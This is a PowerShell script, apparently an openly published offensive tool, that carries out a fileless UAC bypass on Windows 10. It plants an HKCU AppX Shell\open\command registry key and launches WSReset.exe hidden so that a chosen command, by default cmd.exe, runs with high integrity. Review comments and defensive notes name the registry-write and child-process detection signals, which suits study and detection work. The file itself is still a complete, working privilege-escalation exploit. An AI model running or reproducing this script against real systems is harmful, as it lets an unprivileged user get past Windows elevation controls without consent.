Invoke-WSResetBypass.ps1
<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API
Author: Hashim Jawad of ACTIVELabs
.DESCRIPTION
Writes a per-user (HKCU) Shell\open\command key for the AppX package named in
$CommandPath, launches WSReset.exe hidden, waits, and then deletes the key.
The technique relies on WSReset.exe consulting that key when it starts (not
shown in this file). Because HKCU is writable without elevation, the two
artifacts an unprivileged run leaves are the registry key itself and a
WSReset.exe process; presumably the supplied command appears as a child of
WSReset.exe - confirm on a test host. Both are the detection points.
.PARAMETER Command
Specifies the command you would like to run in high integrity context.
Stored verbatim as the key's default value; no validation is performed.
.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"
This will effectively start cmd.exe in high integrity context.
.NOTES
This UAC bypass has been tested on the following:
- Windows 10 Version 1803 OS Build 17134.590
- Windows 10 Version 1809 OS Build 17763.316
Defensive notes: the key is created and removed within a single run, so a
registry-write alert on HKCU\Software\Classes\AppX*\Shell\open\command and a
child-process-of-WSReset.exe alert are the durable signals. The key is left
behind if the script is stopped before the cleanup branch at the end runs.
#>
function Invoke-WSResetBypass {
Param (
# Command line written as the key's default value. Not validated or quoted.
[String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
)
# Both variables hold the same key path; $CommandPath is used for the writes,
# $filePath only by the cleanup branch below.
$CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
$filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
# HKCU is writable by the unprivileged user, so none of these writes prompt.
New-Item $CommandPath -Force | Out-Null
# An empty DelegateExecute value is created next to the default command value.
New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
# -ErrorAction SilentlyContinue: a failed write here is not reported, and the
# success message below is printed regardless.
Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
Write-Host "[+] Registry entry has been created successfully!"
# NOTE(review): Start-Process without -PassThru returns nothing, so $Process
# stays empty and is never read afterwards.
$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
Write-Host "[+] Starting WSReset.exe"
Write-Host "[+] Triggering payload.."
# The key remains in the registry for 500 seconds (~8 minutes) before cleanup;
# interrupting the script during this wait leaves it in place.
Start-Sleep -Seconds 500
# Cleanup: remove the whole key (and any subkeys) if it still exists.
if (Test-Path $filePath) {
Remove-Item $filePath -Recurse -Force
Write-Host "[+] Cleaning up registry entry"
}
}